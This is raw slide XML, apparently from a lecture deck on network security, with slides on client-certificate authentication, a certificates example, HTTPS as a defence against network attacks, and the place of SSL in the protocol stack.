        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6458304" y="5434328"/>
            <a:ext cx="2201935" cy="577265"/>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100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="344488" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="687388" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1031875" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1374775" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1831975" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2289175" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2746375" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3203575" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>4. server uses certificate and evidence to authenticate user's identity </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6458304" y="6137170"/>
            <a:ext cx="2201934" cy="407988"/>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100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="344488" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="687388" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1031875" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1374775" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1831975" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2289175" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2746375" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3203575" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>5. server allows access to resource</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2086618" y="6020373"/>
            <a:ext cx="2359029" cy="577265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="190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defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr defTabSz="687388" eaLnBrk="0" latinLnBrk="0" hangingPunct="0">
              <a:defRPr kumimoji="0" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="344488" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="687388" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1031875" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1374775" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1831975" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2289175" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2746375" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3203575" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>2. client software retrieves</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>private key, and uses it to sign</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>some random data (evidence)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="541585" y="5340195"/>
            <a:ext cx="1760764" cy="407988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050"/>
          <a:extLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68763" tIns="34381" rIns="68763" bIns="34381">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="344488" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="687388" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1031875" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1374775" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1831975" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2289175" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2746375" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3203575" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" latinLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-AU" altLang="ko-KR" sz="1100" dirty="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1. user enters </a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-AU" altLang="ko-KR" sz="1100" dirty="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-AU" altLang="ko-KR" sz="1100" dirty="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>private-key password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5222087A-EB04-834C-AFE5-F127833BD3E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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312155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662" y="794632"/>
            <a:ext cx="8287151" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certificates Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="c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21" y="1908485"/>
            <a:ext cx="4100916" cy="4738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5"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878" y="1908485"/>
            <a:ext cx="4099378" cy="4738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626662" y="2408987"/>
            <a:ext cx="2665561" cy="339522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575"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707976" y="2900909"/>
            <a:ext cx="754404" cy="201198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575"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4D92AFD3-E626-9A4D-865B-97771AAE27A6}"/>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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140099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876938"/>
            <a:ext cx="8271556" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preventing the network attacks(3) :HTTPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="284163" y="2179529"/>
            <a:ext cx="8574087" cy="4535596"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTPS (Hypertext Transfer Protocol Secure)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for secure communication over a computer network, with especially wide deployment on the Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“HTTPS Everywhere” Plug-in for Chrome, Opera, and Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is the result of just layering the HTTP on top of the SSL/TLS protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="925391" y="3857899"/>
            <a:ext cx="6753225" cy="1718276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907704" y="4204050"/>
            <a:ext cx="587375" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent5"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23566CF0-EC34-164E-B43C-AF72A44D6394}"/>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231514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(Secure Socket Layer)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642257" y="2348163"/>
            <a:ext cx="8082643" cy="3918166"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protocol used for secure communication between browsers and servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser uses certificate to  verify server’s identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses certificates and public-key encryption to pass a secret session-specific key from browser to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1220786" y="4383459"/>
            <a:ext cx="984250"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5" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1220786" y="5096246"/>
            <a:ext cx="2952750" cy="711200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFFF00"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="FFFF00">
                  <a:gamma/>
                  <a:shade val="46275"/>
                  <a:invGamma/>
                </a:srgb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latin typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1220786" y="5807446"/>
            <a:ext cx="2952750" cy="711200"/>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7" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2205036" y="4383459"/>
            <a:ext cx="982663"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8" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3187699" y="4383459"/>
            <a:ext cx="985837" cy="712787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="18605A"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="18605A">
                  <a:gamma/>
                  <a:shade val="46275"/>
                  <a:invGamma/>
                </a:srgb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endParaRPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4592637" y="5040684"/>
            <a:ext cx="3333750" cy="708025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050"/>
          <a:extLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="68763" tIns="34381" rIns="68763" bIns="34381">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="687388" eaLnBrk="0" latinLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-AU" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SSL sits above the TCP/IP layer, but below the applications </a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-AU" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-AU" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>layer in the communications stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1276349" y="4439021"/>
            <a:ext cx="874712"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HTTP </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 11"/>
          <p:cNvSpPr>
